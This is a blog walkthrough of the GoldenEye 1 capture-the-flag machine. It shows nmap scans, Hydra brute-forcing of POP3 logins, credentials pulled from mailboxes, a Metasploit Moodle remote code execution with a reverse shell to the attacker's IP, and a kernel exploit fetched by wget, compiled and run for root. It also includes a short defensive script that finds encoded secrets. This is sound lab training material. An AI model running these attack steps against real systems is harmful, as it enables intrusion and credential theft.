Hello everyone, in this blog I am going to post a walkthrough of GoldenEye 1. This machine is for those who have basic knowledge of, and hands-on experience with, penetration testing.
You can download the machine here.
Let’s begin!!

Target IP – 192.168.43.155
Attacker IP – 192.168.43.139
So, let’s start with scanning:
nmap -sC -sV -Pn -p- 192.168.43.155


OK!! We can see there are 4 ports open:
25- smtp
80- http
55006- ssl/pop3
55007- pop3
Now, let’s check the website running on port 80.

It says to navigate to /sev-home/.

OK, we need to log in.
So, I tried a few default usernames and passwords, but they didn’t work.
I thought of checking the page source.

OK, there is a terminal.js. Let’s open it.

We can see there is an HTML-encoded password and two usernames:
boris
natalya
Let’s decode the password.

InvincibleHack3r
We got the password.
Let’s try to log in on /sev-home/:
Username – boris
Password – InvincibleHack3r

We logged in!!
I read the information written on the page.
The last sentence says POP3 is running on a non-default port.
The scan result also says there is POP3 running on port 55007.
Let’s brute-force POP3 with the usernames boris and natalya using the tool Hydra:
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

We found the passwords:
boris – secret1!
natalya – bird
Now, let’s connect to POP3 with nc using the credentials:
nc 192.168.43.155 55007
USER boris
PASS secret1!
LIST

There are 3 messages. Let’s see:
RETR 1

It’s a message from admin to boris.
RETR 2

It’s a message from natalya to boris, saying that natalya can break boris’s codes.
RETR 3

In the 3rd message we can see the access codes are kept in the root directory. So, we can’t access them from here.
Let’s move on to natalya:
nc 192.168.43.155 55007
USER natalya
PASS bird
LIST

There are 2 messages. Let’s see:
RETR 1

It’s a message to natalya, saying that she has to stop breaking boris’s codes.
RETR 2

OK! We got some information here:
username: xenia
password: RCP90rulez!
Domain: severnaya-station.com/gnocertdir
Before opening the domain we have to point severnaya-station.com at the server IP in /etc/hosts:
echo 192.168.43.155 severnaya-station.com >> /etc/hosts
To check:
cat /etc/hosts

Let’s check in the browser.

Now, let’s log in with the credentials we got from natalya’s mail:
username: xenia
password: RCP90rulez!
After logging in, I was exploring and found another user’s chat in messages.

If we read it, it says:
My email username is “doak”.
Let’s brute-force again on POP3 using Hydra, with doak as the username:
hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

OK! We got the password “goat“.
Now, let’s connect to POP3 using nc:
nc 192.168.43.155 55007
USER doak
PASS goat
LIST
RETR 1

So, we got the login credentials of doak:
username: dr_doak
password: 4England!
Let’s log in.

We logged in as dr_doak.
I was checking every module to find any clue; then, in the module My private files, I found a text file “s3cret.txt“.

I downloaded the file and checked whether we could find anything.

So, it says something is located at /dir007key/for-007.jpg:
severnaya-station.com/dir007key/for-007.jpg
So, I opened the above URL in the browser.

It’s an image. So I downloaded it and checked it:
wget http://severnaya-station.com/dir007key/for-007.jpg
strings for-007.jpg

OK! We can see an encoded string. It’s a base64-encoded string:
eFdpbnRlcjE5OTV4IQ==
Let’s decode it.

We got a plain-text string, and we know it is the admin’s password:
username: admin
password: xWinter1995x!
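Both the HTML-entity-encoded password in terminal.js and the base64 string at the tail of the image are secrets protected by nothing more than encoding. The following Python script is an added example, not part of the original walkthrough: it scans constructed sample content modelled on those two findings (the JavaScript snippet and the image strings are made up here, not the VM’s real files) and reports any encoded run that decodes to readable text, the kind of check a defender can run over their own web assets before they are published.

```python
import base64
import html
import re

# Constructed samples modelled on the walkthrough's two findings (not the
# real files from the VM): a JavaScript file that hides a password behind
# HTML character entities, and the printable strings of a JPEG whose tail
# carries a base64 token.
SAMPLE_JS = """
var login = "boris";
// password is &#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
"""
SAMPLE_IMAGE_STRINGS = "JFIF\nExif\nPhotoshop 3.0\neFdpbnRlcjE5OTV4IQ==\n"

# A run of four or more HTML entities is rarely legitimate inside JS source.
ENTITY_RUN = re.compile(r"(?:&#\d+;|&#x[0-9A-Fa-f]+;|&[A-Za-z]+;){4,}")
# A standalone base64-looking token of at least 12 characters.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])")


def find_entity_encoded(text):
    """Return the decoded text of every run of 4+ HTML character entities."""
    return [html.unescape(m.group(0)) for m in ENTITY_RUN.finditer(text)]


def find_base64(text):
    """Return decoded values of base64 tokens that decode to printable ASCII."""
    found = []
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        if len(token) % 4:  # valid base64 is always a multiple of 4 chars
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:
            continue
        if raw and all(32 <= b < 127 for b in raw):  # keep only readable text
            found.append(raw.decode("ascii"))
    return found


def scan_asset(name, text):
    """Report every encoded string in one asset that decodes to readable text."""
    findings = [("html-entity", s) for s in find_entity_encoded(text)]
    findings += [("base64", s) for s in find_base64(text)]
    return [(name, kind, value) for kind, value in findings]


if __name__ == "__main__":
    for asset, content in (("terminal.js", SAMPLE_JS), ("for-007.jpg", SAMPLE_IMAGE_STRINGS)):
        for name, kind, value in scan_asset(asset, content):
            print(f"{name}: {kind} encoded string decodes to {value!r}")
```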
Let’s log in.
We logged in as ADMIN.
Now, we should get a shell on our terminal.
I searched for a way to upload a file to get a reverse shell but didn’t find any.
After exploring, I found that the website is “MOODLE” and found its version.

I checked whether there is any exploit for Moodle 2.2.3 and found there is a Remote Code Execution vulnerability.
So, I started the Metasploit Framework:
msfconsole
use exploit/multi/http/moodle_cmd_exec
show options

set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set username admin
set payload cmd/unix/reverse
set lhost 192.168.43.139
set lport 4444
exploit

We got the shell.
Now we have to get root access:
uname -a

So, I got the version details.
I checked for an exploit and found one.

Let’s download it and edit the code.

By default it is gcc; change it to cc, as gcc isn’t working in the shell we got.
Save it and start a Python HTTP server:
python -m SimpleHTTPServer 8080
Now, let’s fetch the file from the shell we got and compile it:
wget http://192.168.43.139:8080/exploit.c
cc exploit.c -o priv

./priv
id

Here, I got ROOT access.
Writer: Anudeep is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.